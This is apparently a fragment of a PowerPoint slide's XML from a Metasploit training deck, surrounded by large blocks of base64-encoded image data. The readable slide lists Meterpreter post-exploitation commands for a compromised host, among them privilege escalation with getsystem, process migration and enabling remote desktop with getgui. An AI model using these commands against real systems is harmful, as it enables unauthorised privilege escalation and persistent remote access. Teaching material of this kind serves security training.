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38253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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit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7974" y="1143000"/>
            <a:ext cx="8531225" cy="5029200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You have a shell… now what?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	Situational Awareness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (tells you what user your sessions is running as)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getsystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (tries various techniques to escalate privileges)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	What’s running?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (shows all processes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		migrate &lt;process id&gt; (moves to a new process)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	Turn on remote desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getgui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBhQREBQUEhIVFRIWFRQUFBUUERUUFBYVFhQVGBUUFRQXHCYeFxojGhUUHy8gIycqLCwsFx4xNTAqNSYrLCoBCQoKDgwOGg8PGiwkHyQpLCksLCwsLCwsLCwpLCksLCksLCwsLCksLCwsLCksLCwsLCksLCkpLCwsLCksLCwsLP/AABEIAOEA4QMBIgACEQEDEQH/xAAcAAABBQEBAQAAAAAAAAAAAAAAAwQFBgcCAQj/xABHEAACAQIDBAYHBAkCBAcBAAABAgMAEQQSIQUGMUETIlFhcZEHMlKBobHBFCNy0TNCYoKissLh8BVzNIOS8SREU2OTs9Il/8QAGQEAAwEBAQAAAAAAAAAAAAAAAAIDAQQF/8QAJREAAgICAwACAgIDAAAAAAAAAAECESExAxJBIlEEE5GhQmFx/9oADAMBAAIRAxEAPwDcaKKKACiiigAooooAKK8LW41E4rb4vliXpG7f1R7+f+a1tWY3RLE1H4nb0SaZsx7F1+PD41GPhpJdZnNvYXQfl86XhwiJ6qgd/E+ZraMtg23JX/Rw2Ha5/wC1JMcS3rShe5R+Q+tO6pm7O/7YraE+FkhWMJ0oiYOWLmGTLIDew4ENYDkeNMl9GP8A2WQ7MLetNIfefqTXn+ipzLH3j8qpO/G3cZHjpI4MSYkTAti0URRPmeNmzKS6k2Kq3lTzereOU7AGKjcxzPFhnzRkqQzvHnynkNWHhTU8C2i1f6Ina3mPyr0bLI9WWQfvflaq1uLj5/teOw0s8kyQHDmNpbGQdLGWYFgBccOPZVwxM4jRnb1UVnPgoJPwFK7To1U1Y3VcQvqzX7mF/nelU2xOnrxBh2obH61RdzN/sTiJsNHiYorYqKWWNos6sgiZ1+8RiRY9G1iD2VYNtb+YTB4gQTuyN0YkLCNmRVLFRnK3K8Oy2o1rXF6BNbLLht4Ym0JKHsYWHnw86klcEXBuO0aioR4VkFyARa4NuXjxFNlwLRm8Llf2TqD/AJ30lIa2WWioXD7fKnLOuU+0NVP+d16mI5AwBBBB4EG4rGqNTs6ooorDQooooAKKKKACiiigAooooAKKKKACmuO2ikQux15KOJ/ztpHae1RH1VGaQ8B2d5/Ko6DCEtnkOZz28B4VqRjZzKZMRq5yR8kHPx/v5U32xtnD4CAyzNkjBC6KWZmN7KANSTY8eyoDeT0jQwCPoj0kTySQS4iIh/s8gXjksc7C+a3AhGteudiTDamz5sJimDToOhldbENpmgxSW4hgFcHnY8jVK9Yl/RLY3GT4nZ0kmHSXDYho3aJZFXpQVJKgqbgF1HiM3dVI9HO8ZOMjX7U0seIwweRJ8RneLFIxVlUMb9fKSFGtmHs3qY9GeOxDNPFi8STJhMuHMBRQqqtss5k9ZycpFzy8RVY3j3blixWJw2Hw8jtJNDjsFJGgtDJnIkDyGwRPW4njGnbTpbQrembJWJbRxMmF2jiMQsRMeE2i0ssoZbCLFBFaMpxNwvEaC/fW2Jewva9he3C/O3deos7rYctiWaPP9qKGdXJKN0Ystl5dvjSRdDSVlQ342UmI2vs9Gd1jngxETNE+RmUKz5c2vVbOARzBNO/SfgUh2G8US2ROgRFFzYLIlh2nhzq5pgoxktGn3Yyx9UdQWAsh4qLADTs